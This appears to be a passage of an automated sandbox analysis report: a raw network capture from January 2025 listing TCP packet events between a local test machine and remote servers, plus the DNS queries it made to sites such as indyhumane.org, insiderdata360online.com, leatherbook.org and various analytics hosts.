                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.495006084 CET44349882192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.495053053 CET49882443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.495307922 CET44349882192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.495330095 CET44349882192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.495352030 CET49882443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.495356083 CET44349882192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.495387077 CET49882443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.495644093 CET44349882192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.495657921 CET44349882192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.495704889 CET49882443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.495708942 CET44349882192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.495970011 CET44349882192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.495986938 CET44349882192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.495990992 CET49882443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.495996952 CET44349882192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.496014118 CET49882443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.496057987 CET49882443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.496325970 CET44349882192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.496340036 CET44349882192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.496391058 CET49882443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.496395111 CET44349882192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.496471882 CET49882443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.496635914 CET44349882192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.496651888 CET44349882192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.496689081 CET49882443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.496694088 CET44349882192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.496714115 CET49882443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.496738911 CET49882443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.497081995 CET44349882192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.497095108 CET44349882192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.497122049 CET49882443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.497127056 CET44349882192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.497148991 CET49882443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.497169018 CET49882443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.497459888 CET44349882192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.497473955 CET44349882192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.497520924 CET49882443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.497524977 CET44349882192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.497545958 CET49882443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.497559071 CET49882443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.503608942 CET4434989244.219.163.77192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.503859997 CET49892443192.168.2.444.219.163.77
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.503875017 CET4434989244.219.163.77192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.504741907 CET4434989244.219.163.77192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.504822969 CET49892443192.168.2.444.219.163.77
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.505238056 CET49892443192.168.2.444.219.163.77
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.505285978 CET49892443192.168.2.444.219.163.77
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.505291939 CET4434989244.219.163.77192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.505300999 CET4434989244.219.163.77192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.557749987 CET49892443192.168.2.444.219.163.77
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.557760000 CET4434989244.219.163.77192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.581942081 CET44349882192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.581960917 CET44349882192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.581995964 CET49882443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.582005978 CET44349882192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.582032919 CET49882443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.582051992 CET49882443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.582087994 CET44349882192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.582103968 CET44349882192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.582127094 CET49882443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.582130909 CET44349882192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.582155943 CET49882443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.582165956 CET49882443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.582425117 CET44349882192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.582442999 CET44349882192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.582469940 CET49882443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.582473040 CET44349882192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.582504034 CET49882443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.582698107 CET44349882192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.582717896 CET44349882192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.582751989 CET49882443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.582756996 CET44349882192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.582789898 CET49882443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.582799911 CET49882443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.583363056 CET44349882192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.583378077 CET44349882192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.583404064 CET49882443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.583409071 CET44349882192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.583441973 CET49882443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.583718061 CET44349882192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.583743095 CET44349882192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.583785057 CET49882443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.583790064 CET44349882192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.583798885 CET49882443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.583868027 CET49882443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.584075928 CET44349882192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.584089994 CET44349882192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.584120035 CET49882443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.584124088 CET44349882192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.584136009 CET49882443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.584146023 CET44349882192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.584161997 CET44349882192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.584166050 CET49882443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.584172964 CET44349882192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.584242105 CET49882443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.584242105 CET49882443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.584724903 CET44349881157.240.0.6192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.584784985 CET49881443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.584813118 CET44349881157.240.0.6192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.584881067 CET44349881157.240.0.6192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.584966898 CET49881443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.584980965 CET44349881157.240.0.6192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.585153103 CET49882443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.603183985 CET49892443192.168.2.444.219.163.77
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.636830091 CET49881443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.657943964 CET4434989244.219.163.77192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.657989025 CET4434989244.219.163.77192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.658066034 CET49892443192.168.2.444.219.163.77
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.663645983 CET44349889173.194.76.154192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.663710117 CET44349889173.194.76.154192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.665936947 CET49889443192.168.2.4173.194.76.154
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.668500900 CET44349882192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.668538094 CET44349882192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.668565989 CET49882443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.668571949 CET44349882192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.668579102 CET44349882192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.668616056 CET49882443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.669429064 CET49889443192.168.2.4173.194.76.154
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.669439077 CET44349889173.194.76.154192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.671267033 CET49892443192.168.2.444.219.163.77
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.671281099 CET4434989244.219.163.77192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.672941923 CET49882443192.168.2.4192.0.77.39
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.672954082 CET44349882192.0.77.39192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.673398018 CET44349881157.240.0.6192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.673405886 CET44349881157.240.0.6192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.673430920 CET44349881157.240.0.6192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.673441887 CET44349881157.240.0.6192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.673460007 CET44349881157.240.0.6192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.673459053 CET49881443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.673475027 CET44349881157.240.0.6192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.673500061 CET49881443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.673516035 CET49881443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.673527002 CET49881443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.674521923 CET4434989098.98.135.24192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.674570084 CET4434989098.98.135.24192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.674618006 CET49890443192.168.2.498.98.135.24
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.677279949 CET44349893157.240.252.13192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.677522898 CET49893443192.168.2.4157.240.252.13
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.677535057 CET44349893157.240.252.13192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.677752018 CET49890443192.168.2.498.98.135.24
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.677757025 CET4434989098.98.135.24192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.678395033 CET44349893157.240.252.13192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.678453922 CET49893443192.168.2.4157.240.252.13
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.679100990 CET49893443192.168.2.4157.240.252.13
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.679152012 CET44349893157.240.252.13192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.679523945 CET49893443192.168.2.4157.240.252.13
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.679531097 CET44349893157.240.252.13192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.681664944 CET49899443192.168.2.498.98.135.24
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.681685925 CET4434989998.98.135.24192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.681746006 CET49899443192.168.2.498.98.135.24
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.682099104 CET49899443192.168.2.498.98.135.24
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.682109118 CET4434989998.98.135.24192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.701523066 CET44349881157.240.0.6192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.701555014 CET44349881157.240.0.6192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.701582909 CET49881443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.701605082 CET44349881157.240.0.6192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.701618910 CET49881443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.707350016 CET44349881157.240.0.6192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.707397938 CET49881443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.707406998 CET44349881157.240.0.6192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.731638908 CET49893443192.168.2.4157.240.252.13
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.736048937 CET44349881157.240.0.6192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.736071110 CET44349881157.240.0.6192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.736104965 CET49881443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.736118078 CET44349881157.240.0.6192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.736202002 CET49881443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.736202002 CET49881443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.758074045 CET44349881157.240.0.6192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.758209944 CET49881443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.773443937 CET44349881157.240.0.6192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.773475885 CET44349881157.240.0.6192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.773504972 CET49881443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.773513079 CET44349881157.240.0.6192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.773533106 CET49881443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.781517029 CET44349881157.240.0.6192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.781539917 CET44349881157.240.0.6192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.781590939 CET49881443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.781599998 CET44349881157.240.0.6192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.781624079 CET49881443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.781712055 CET44349881157.240.0.6192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.782046080 CET49881443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.782046080 CET49881443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.782264948 CET49881443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.791793108 CET49904443192.168.2.4157.240.252.13
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.791815996 CET44349904157.240.252.13192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.792087078 CET49904443192.168.2.4157.240.252.13
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.792087078 CET49904443192.168.2.4157.240.252.13
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.792114973 CET44349904157.240.252.13192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.817451000 CET49905443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.817471027 CET44349905157.240.0.6192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.817553997 CET49905443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.818356991 CET49905443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.818368912 CET44349905157.240.0.6192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.826565027 CET49906443192.168.2.4157.240.0.35
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.826595068 CET44349906157.240.0.35192.168.2.4
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.826719999 CET49906443192.168.2.4157.240.0.35
                                                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:04.622133017 CET192.168.2.41.1.1.10xee16Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:04.622288942 CET192.168.2.41.1.1.10x570fStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:05.962956905 CET192.168.2.41.1.1.10x37cfStandard query (0)indyhumane.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:05.963109970 CET192.168.2.41.1.1.10x4405Standard query (0)indyhumane.org65IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:06.588006020 CET192.168.2.41.1.1.10xa699Standard query (0)indyhumane.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:06.588310957 CET192.168.2.41.1.1.10x9866Standard query (0)indyhumane.org65IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:08.655924082 CET192.168.2.41.1.1.10xee78Standard query (0)149955744.v2.pressablecdn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:08.655951023 CET192.168.2.41.1.1.10x8f77Standard query (0)149955744.v2.pressablecdn.com65IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:08.820348024 CET192.168.2.41.1.1.10xae85Standard query (0)g.petango.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:08.820516109 CET192.168.2.41.1.1.10xde14Standard query (0)g.petango.com65IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.946770906 CET192.168.2.41.1.1.10xcd59Standard query (0)g.petango.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.946917057 CET192.168.2.41.1.1.10xd922Standard query (0)g.petango.com65IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:10.006596088 CET192.168.2.41.1.1.10x2986Standard query (0)149955744.v2.pressablecdn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:10.006726027 CET192.168.2.41.1.1.10x88d1Standard query (0)149955744.v2.pressablecdn.com65IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:11.878272057 CET192.168.2.41.1.1.10x8cf3Standard query (0)sb.scorecardresearch.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:11.878402948 CET192.168.2.41.1.1.10xe07eStandard query (0)sb.scorecardresearch.com65IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:12.420263052 CET192.168.2.41.1.1.10x3ebfStandard query (0)cdn.customgpt.aiA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:12.420401096 CET192.168.2.41.1.1.10x250aStandard query (0)cdn.customgpt.ai65IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:13.008042097 CET192.168.2.41.1.1.10xde6eStandard query (0)sb.scorecardresearch.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:13.008194923 CET192.168.2.41.1.1.10x55edStandard query (0)sb.scorecardresearch.com65IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:13.497507095 CET192.168.2.41.1.1.10x9e4eStandard query (0)leatherbook.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:13.497648954 CET192.168.2.41.1.1.10xfbbfStandard query (0)leatherbook.org65IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:13.500897884 CET192.168.2.41.1.1.10x718Standard query (0)insiderdata360online.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:13.501025915 CET192.168.2.41.1.1.10x5af0Standard query (0)insiderdata360online.com65IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:13.510926962 CET192.168.2.41.1.1.10xd8f1Standard query (0)insiderdata360online.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:13.543915033 CET192.168.2.41.1.1.10x9c55Standard query (0)cdn.customgpt.aiA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:13.544086933 CET192.168.2.41.1.1.10x4c0Standard query (0)cdn.customgpt.ai65IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:14.512418032 CET192.168.2.41.1.1.10x4d4Standard query (0)insiderdata360online.com65IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:14.854504108 CET192.168.2.41.1.1.10x8f77Standard query (0)secure.gaug.esA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:14.854688883 CET192.168.2.41.1.1.10x56f8Standard query (0)secure.gaug.es65IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:15.049313068 CET192.168.2.41.1.1.10xe6ccStandard query (0)connect.facebook.net65IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:15.049313068 CET192.168.2.41.1.1.10x6f5dStandard query (0)connect.facebook.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:15.154546976 CET192.168.2.41.1.1.10x9a9cStandard query (0)up.pixel.adA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:15.155134916 CET192.168.2.41.1.1.10x2345Standard query (0)up.pixel.ad65IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:15.157217026 CET192.168.2.41.1.1.10xe573Standard query (0)leatherbook.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:15.157392025 CET192.168.2.41.1.1.10x1902Standard query (0)leatherbook.org65IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:15.533214092 CET192.168.2.41.1.1.10x2285Standard query (0)insiderdata360online.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:15.547904968 CET192.168.2.41.1.1.10x7920Standard query (0)insiderdata360online.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:15.548356056 CET192.168.2.41.1.1.10xcd76Standard query (0)insiderdata360online.com65IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:15.636238098 CET192.168.2.41.1.1.10x7bd7Standard query (0)virtual.urban-orthodontics.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:15.636523008 CET192.168.2.41.1.1.10x93aStandard query (0)virtual.urban-orthodontics.com65IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:15.661504030 CET192.168.2.41.1.1.10xcbefStandard query (0)secure.gaug.esA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:15.661504030 CET192.168.2.41.1.1.10x6877Standard query (0)secure.gaug.es65IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:15.811402082 CET192.168.2.41.1.1.10xef02Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:15.811541080 CET192.168.2.41.1.1.10xf8b5Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:16.379367113 CET192.168.2.41.1.1.10x6f20Standard query (0)analytics.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:16.379547119 CET192.168.2.41.1.1.10x4aStandard query (0)analytics.google.com65IN (0x0001)false
